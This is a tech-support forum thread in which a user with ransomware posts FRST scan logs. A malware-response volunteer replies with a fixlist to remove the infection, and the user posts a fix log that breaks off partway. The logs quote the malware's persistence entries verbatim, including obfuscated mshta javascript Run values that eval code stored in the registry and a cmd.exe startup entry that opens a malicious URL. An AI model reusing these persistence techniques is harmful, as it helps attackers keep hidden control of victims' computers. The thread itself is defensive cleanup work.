2015-11-09 18:37 - 2012-02-25 01:25 - 00000000 ____D C:\Users\KW\AppData\Local\Ares
2015-11-09 18:37 - 2012-02-16 19:28 - 00000000 ____D C:\Users\KW\AppData\Local\Adobe
2015-11-09 18:37 - 2012-01-26 15:15 - 00000000 ____D C:\Users\KW\AppData\Local\FOMM
2015-11-09 18:37 - 2012-01-25 21:14 - 00000000 ____D C:\Users\KW\AppData\Local\Fallout3
2015-11-09 18:37 - 2011-12-30 00:17 - 00000000 __SHD C:\ProgramData\SecuROM
2015-11-09 18:37 - 2011-12-28 03:46 - 00000000 ____D C:\Users\KW\AppData\Local\2K Games
2015-11-09 18:37 - 2011-12-27 21:27 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-11-09 18:37 - 2011-12-15 15:07 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2015-11-09 18:36 - 2015-08-26 20:45 - 00000000 ____D C:\Qoobox
2015-11-09 18:36 - 2015-06-30 04:07 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2015-11-09 18:36 - 2015-03-01 03:30 - 00000000 ____D C:\ProgramData\Garena
2015-11-09 18:36 - 2014-11-11 20:53 - 00000000 ____D C:\ProgramData\Auslogics
2015-11-09 18:36 - 2013-09-07 19:21 - 00000000 ____D C:\ProgramData\Cisco Systems
2015-11-09 18:36 - 2013-05-18 00:05 - 00000000 ____D C:\ProgramData\ClubSanDisk
2015-11-09 18:36 - 2012-11-26 02:56 - 00000000 ____D C:\ProgramData\Apple Computer
2015-11-09 18:36 - 2012-11-26 02:55 - 00000000 ____D C:\ProgramData\Apple
2015-11-09 18:36 - 2012-04-27 17:09 - 00000000 ____D C:\ProgramData\Digidesign
2015-11-09 18:36 - 2012-04-27 17:04 - 00000000 ____D C:\ProgramData\DigiDriver
2015-11-09 18:36 - 2012-03-16 14:12 - 00000000 ____D C:\ProgramData\Electronic Arts
2015-11-09 18:36 - 2012-02-20 17:02 - 00000000 ____D C:\ProgramData\3DMGAME
2015-11-09 18:36 - 2012-02-16 19:27 - 00000000 ____D C:\ProgramData\Adobe
2015-11-09 18:36 - 2011-12-29 18:38 - 00000000 __SHD C:\ProgramData\DSS
2015-11-09 18:36 - 2011-12-15 16:40 - 00000000 ____D C:\Sysprep
2015-11-09 18:05 - 2014-08-12 15:02 - 00000000 ___RD C:\Users\KW\Downloads\Movies
2015-11-04 20:03 - 2015-09-05 02:08 - 00000000 ___HD C:\Windows\msdownld.tmp
2015-11-04 20:03 - 2012-02-20 15:50 - 00000000 ____D C:\Windows\SysWOW64\directx
2015-11-04 18:25 - 2012-08-30 19:36 - 00000000 ____D C:\Users\KW\Downloads\Games
2015-10-31 18:05 - 2014-12-24 17:01 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-10-23 21:41 - 2014-12-28 00:01 - 00104379 _____ C:\Windows\DirectX.log
2015-10-23 00:04 - 2012-09-11 01:49 - 00002189 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-10-21 15:18 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\rescache
2015-10-17 22:16 - 2015-03-01 03:04 - 00000000 ____D C:\Program Files (x86)\Steam
2015-10-17 20:21 - 2009-07-13 23:08 - 00032630 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-10-15 15:23 - 2014-12-16 23:24 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-10-15 00:17 - 2014-12-10 05:28 - 00000000 ____D C:\Windows\system32\appraiser
2015-10-15 00:17 - 2014-05-05 17:39 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-10-14 12:25 - 2014-10-27 22:09 - 00000000 ____D C:\Windows\system32\MRT
2015-10-14 12:20 - 2012-09-20 00:15 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-10-14 12:20 - 2011-04-06 13:08 - 143481208 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-10-14 12:18 - 2009-07-13 20:34 - 00000478 _____ C:\Windows\win.ini
2015-10-13 15:36 - 2014-11-18 23:05 - 00024474 _____ C:\Windows\PFRO.log

==================== Files in the root of some directories =======

2013-02-16 21:27 - 2013-02-16 21:27 - 2174976 _____ (Advanced Micro Devices Inc.) C:\Program Files (x86)\Common Files\atimpenc.dll
2014-09-01 02:18 - 2014-09-01 02:18 - 0001248 _____ () C:\Users\KW\AppData\Roaming\DZZPF
2014-09-01 02:18 - 2014-09-01 02:18 - 0001248 _____ () C:\Users\KW\AppData\Roaming\FECWQT
2015-11-09 20:16 - 2015-11-09 20:16 - 0005701 _____ () C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 0002561 _____ () C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
2014-09-01 02:18 - 2014-09-01 02:18 - 0002086 _____ () C:\Users\KW\AppData\Roaming\IJFXTJV
2015-11-09 18:29 - 2015-11-09 18:29 - 0466944 _____ () C:\Users\KW\AppData\Roaming\popry-a.exe
2014-09-01 02:18 - 2014-09-01 02:18 - 0002086 _____ () C:\Users\KW\AppData\Roaming\SXQHCMK
2015-11-09 18:37 - 2015-11-09 20:12 - 0005701 _____ () C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
2015-11-09 18:37 - 2015-11-09 20:12 - 0002561 _____ () C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
2015-11-09 18:36 - 2015-11-09 18:37 - 0005701 _____ () C:\ProgramData\howto_recover_file_mbeso.html
2015-11-09 18:36 - 2015-11-09 18:37 - 0002561 _____ () C:\ProgramData\howto_recover_file_mbeso.txt
2015-11-09 18:30 - 2015-11-09 18:30 - 0004096 _____ () C:\ProgramData\igfxCUIService.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 0004096 _____ () C:\ProgramData\IntelCpHeciSvc.dll

Files to move or delete:
====================
C:\ProgramData\igfxCUIService.exe
C:\ProgramData\IntelCpHeciSvc.dll
C:\Users\KW\nsrulzde.exe

Some files in TEMP:
====================
C:\Users\KW\AppData\Local\Temp\bitool.dll
C:\Users\KW\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\KW\AppData\Local\Temp\nvStInst.exe
C:\Users\KW\AppData\Local\Temp\Quarantine.exe
C:\Users\KW\AppData\Local\Temp\sonarinst.exe
C:\Users\KW\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-10-31 14:39

==================== End of FRST.txt ============================

 

A couple of last things. My desktop wallpaper is just grey now. I had seen this before but only sometimes when I started my computer and it would go back to my original wallpaper in about a minute. Also a black command prompt screen will nothing in it will flash a couple of times as the desktop starts up. On the top it says c:\users\kw\appdata\roaming\popry-4.exe. This, like the grey screen, has been happening for months before this ransomware popped up. I will also try to attach the addition.txt file but it looks encrypted now.

 

Edit: I'm sorry I accidentally posted the thread three times. I don't know how to delete the other two. Also I just wanna say I'd appreciate any help you can give. Thanks.

Attached Files


Edited by snapjaw, 10 November 2015 - 12:59 PM.


BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,569 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:28 PM

Posted 12 November 2015 - 11:37 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Unless you pay to restore your files nothing can be suggested that would restore them.
I certainly would not pay and I would not trust them.
Your call

If you have a good backup of your files you can restore them after the fix suggested below.

The following fix will remove all registry entries, folders, files that were installed by the infection.
If you wish to go this route please proceed.

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

() C:\Users\KW\AppData\Roaming\popry-a.exe
HKLM-x32\...\Run: [codec Settings UAC Manager] => C:\Windows\SysWOW64\C2MP\CodecUACManager.exe [60432 2015-03-05] ()
HKLM-x32\...\Run: [Babakan] => cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131027 (exit) else (start hxxp://dinoraptzor.org && exit)
HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [MSConfig] => C:\Users\KW\nsrulzde.exe [42729472 2015-11-09] (Intrusion falcon)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**7fae0a5e<*>] => mshta javascript:UAD0hTWO7="4FeVa";zV49=new%20ActiveXObject("WScript.Shell");AmhGb2JU="IVvGbj5Im0";RFfX53=zV49.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");JroDWU94GX="Ym8vbyTbb0";eval(RFfX53);Ou4b (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**ca7e5942<*>] => mshta javascript:spA4CiQ="RkJDrEB";I66o=new%20ActiveXObject("WScript.Shell");skS8mNl2="GasX";he1Qt7=I66o.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");kaUc5Rfu="6YqP6NSb";eval(he1Qt7);u0D0pmrf="e"; <===== ATTENTION (Value Name with invalid characters)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2015-03-25]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\C2MP\TrayMenu.exe (No File)
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html [2015-11-09] ()
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt [2015-11-09] ()
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\KW\Downloads\Applications\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html [2015-11-09]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt [2015-11-09]
S3 GalaxyClientService; "C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe" [X]
S2 PinnacleUpdateSvc; C:\Users\KW\Downloads\Games\Install Directory\Mass Effect 3 360 Pinnacle Game Profiler\pinnacle_updater.exe [X]
S3 Secunia PSI Agent; "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service [X]
S3 cleanhlp; \??\C:\Users\KW\Downloads\Applications\Emirson Emergency Kit\Emirson Emergency Kit (Extracted Files)\bin\cleanhlp64.sys [X]
S3 NvStUSB; \SystemRoot\system32\drivers\nvstusb.sys [X]
Task: {4811701C-FA0B-475F-BC94-B931A8442A1C} - System32\Tasks\IJFXTJV => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: {4D6E08EF-71B0-4FE1-99B9-3F6B34438E95} - System32\Tasks\4343 => Wscript.exe C:\Users\KW\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {62D75B3F-795C-40D3-83BE-45B8F4101BCF} - System32\Tasks\SXQHCMK => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
Task: {6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B} - System32\Tasks\DZZPF => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: {7009D75B-6D4C-4599-9BFF-9189E5E3A946} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
Task: {958954B3-7CA1-4897-9FBD-CDC081C1F5B6} - System32\Tasks\FECWQT => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: {A911910C-5B46-492B-8E9B-A5C37E9BE803} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {B8687491-B4A9-4E61-B701-C84380BEB419} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
Task: C:\Windows\Tasks\DZZPF.job => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: C:\Windows\Tasks\FECWQT.job => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: C:\Windows\Tasks\IJFXTJV.job => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: C:\Windows\Tasks\SXQHCMK.job => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
AlternateDataStreams: C:\ProgramData\Microsoft:1JUrhqBxzVBn2oXHbF3idLRjdaK
AlternateDataStreams: C:\ProgramData\Microsoft:Bw0yU4h7WSa9zkLTBQbP
AlternateDataStreams: C:\ProgramData\Microsoft:er7Z6YcKSZpsAnbNiAs9nu4Y
AlternateDataStreams: C:\Users\KW\Cookies:8Cf9Q91WWNGZLUUlFb4AQuDRHLBm
AlternateDataStreams: C:\Users\KW\Cookies:Ni6hbrdQGoIWWA8FzMivntYD
AlternateDataStreams: C:\Users\KW\Local Settings:init
AlternateDataStreams: C:\Users\KW\AppData\Local:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Application Data:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Temporary Internet Files:puluywQBOvJITXRnmnlZvT
C:\Users\KW\AppData\Roaming\IJFXTJV.exe
C:\Users\KW\AppData\Local\Temp\launchie.vbs
C:\Users\KW\AppData\Roaming\SXQHCMK.exe
C:\Users\KW\AppData\Roaming\DZZPF.exe
C:\Users\KW\AppData\Roaming\FECWQT.exe
C:\Windows\SysWOW64\C2MP
C:\Users\KW\AppData\Roaming\popry-a.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt
C:\Users\KW\Documents\howto_recover_file_mbeso.html
C:\Users\KW\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\ProgramData\howto_recover_file_mbeso.txt
C:\Users\Public\Documents\howto_recover_file_mbeso.html
C:\Users\Public\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\Users\KW\nsrulzde.exe
[b][/b]C:\Users\KW\AppData\Local\Temp\Quarantine.exe
C:\Users\KW\AppData\Local\Temp\sonarinst.exe
C:\Users\KW\AppData\Local\Temp\sqlite3.dll

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Let me know what problem persists.

#3 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 12 November 2015 - 04:12 PM

It didn't really change anything. Only difference is that I can get to task manager now. Oh and I noticed before I ran FRST that picture files are encrypted as well. Here is the fix log.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:07-11-2015
Ran by KW (2015-11-12 14:38:46) Run:1
Running from C:\Users\KW\Desktop
Loaded Profiles: KW (Available Profiles: KW)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

() C:\Users\KW\AppData\Roaming\popry-a.exe
HKLM-x32\...\Run: [codec Settings UAC Manager] => C:\Windows\SysWOW64\C2MP\CodecUACManager.exe [60432 2015-03-05] ()
HKLM-x32\...\Run: [Babakan] => cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131027 (exit) else (start hxxp://dinoraptzor.org && exit)
HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [MSConfig] => C:\Users\KW\nsrulzde.exe [42729472 2015-11-09] (Intrusion falcon)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**7fae0a5e<*>] => mshta javascript:UAD0hTWO7="4FeVa";zV49=new%20ActiveXObject("WScript.Shell");AmhGb2JU="IVvGbj5Im0";RFfX53=zV49.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");JroDWU94GX="Ym8vbyTbb0";eval(RFfX53);Ou4b (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**ca7e5942<*>] => mshta javascript:spA4CiQ="RkJDrEB";I66o=new%20ActiveXObject("WScript.Shell");skS8mNl2="GasX";he1Qt7=I66o.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");kaUc5Rfu="6YqP6NSb";eval(he1Qt7);u0D0pmrf="e"; <===== ATTENTION (Value Name with invalid characters)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2015-03-25]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\C2MP\TrayMenu.exe (No File)
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html [2015-11-09] ()
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt [2015-11-09] ()
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\KW\Downloads\Applications\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html [2015-11-09]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt [2015-11-09]
S3 GalaxyClientService; "C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe" [X]
S2 PinnacleUpdateSvc; C:\Users\KW\Downloads\Games\Install Directory\Mass Effect 3 360 Pinnacle Game Profiler\pinnacle_updater.exe [X]
S3 Secunia PSI Agent; "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service [X]
S3 cleanhlp; \??\C:\Users\KW\Downloads\Applications\Emirson Emergency Kit\Emirson Emergency Kit (Extracted Files)\bin\cleanhlp64.sys [X]
S3 NvStUSB; \SystemRoot\system32\drivers\nvstusb.sys [X]
Task: {4811701C-FA0B-475F-BC94-B931A8442A1C} - System32\Tasks\IJFXTJV => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: {4D6E08EF-71B0-4FE1-99B9-3F6B34438E95} - System32\Tasks\4343 => Wscript.exe C:\Users\KW\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {62D75B3F-795C-40D3-83BE-45B8F4101BCF} - System32\Tasks\SXQHCMK => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
Task: {6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B} - System32\Tasks\DZZPF => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: {7009D75B-6D4C-4599-9BFF-9189E5E3A946} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
Task: {958954B3-7CA1-4897-9FBD-CDC081C1F5B6} - System32\Tasks\FECWQT => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: {A911910C-5B46-492B-8E9B-A5C37E9BE803} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {B8687491-B4A9-4E61-B701-C84380BEB419} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
Task: C:\Windows\Tasks\DZZPF.job => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: C:\Windows\Tasks\FECWQT.job => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: C:\Windows\Tasks\IJFXTJV.job => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: C:\Windows\Tasks\SXQHCMK.job => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
AlternateDataStreams: C:\ProgramData\Microsoft:1JUrhqBxzVBn2oXHbF3idLRjdaK
AlternateDataStreams: C:\ProgramData\Microsoft:Bw0yU4h7WSa9zkLTBQbP
AlternateDataStreams: C:\ProgramData\Microsoft:er7Z6YcKSZpsAnbNiAs9nu4Y
AlternateDataStreams: C:\Users\KW\Cookies:8Cf9Q91WWNGZLUUlFb4AQuDRHLBm
AlternateDataStreams: C:\Users\KW\Cookies:Ni6hbrdQGoIWWA8FzMivntYD
AlternateDataStreams: C:\Users\KW\Local Settings:init
AlternateDataStreams: C:\Users\KW\AppData\Local:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Application Data:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Temporary Internet Files:puluywQBOvJITXRnmnlZvT
C:\Users\KW\AppData\Roaming\IJFXTJV.exe
C:\Users\KW\AppData\Local\Temp\launchie.vbs
C:\Users\KW\AppData\Roaming\SXQHCMK.exe
C:\Users\KW\AppData\Roaming\DZZPF.exe
C:\Users\KW\AppData\Roaming\FECWQT.exe
C:\Windows\SysWOW64\C2MP
C:\Users\KW\AppData\Roaming\popry-a.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt
C:\Users\KW\Documents\howto_recover_file_mbeso.html
C:\Users\KW\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\ProgramData\howto_recover_file_mbeso.txt
C:\Users\Public\Documents\howto_recover_file_mbeso.html
C:\Users\Public\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\Users\KW\nsrulzde.exe
C:\Users\KW\AppData\Local\Temp\Quarantine.exe
C:\Users\KW\AppData\Local\Temp\sonarinst.exe
C:\Users\KW\AppData\Local\Temp\sqlite3.dll

End
*****************

Restore point was successfully created.
Processes closed successfully.
[2780] C:\Users\KW\AppData\Roaming\popry-a.exe => process closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\codec Settings UAC Manager => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Babakan => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\qewr2342 => value removed successfully
"HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" => key removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\MSConfig => value removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\qewr2342 => value removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\**7fae0a5e<*> => value removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\**ca7e5942<*> => value removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk => moved successfully
C:\Windows\SysWOW64\C2MP\TrayMenu.exe => not found.
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html => moved successfully
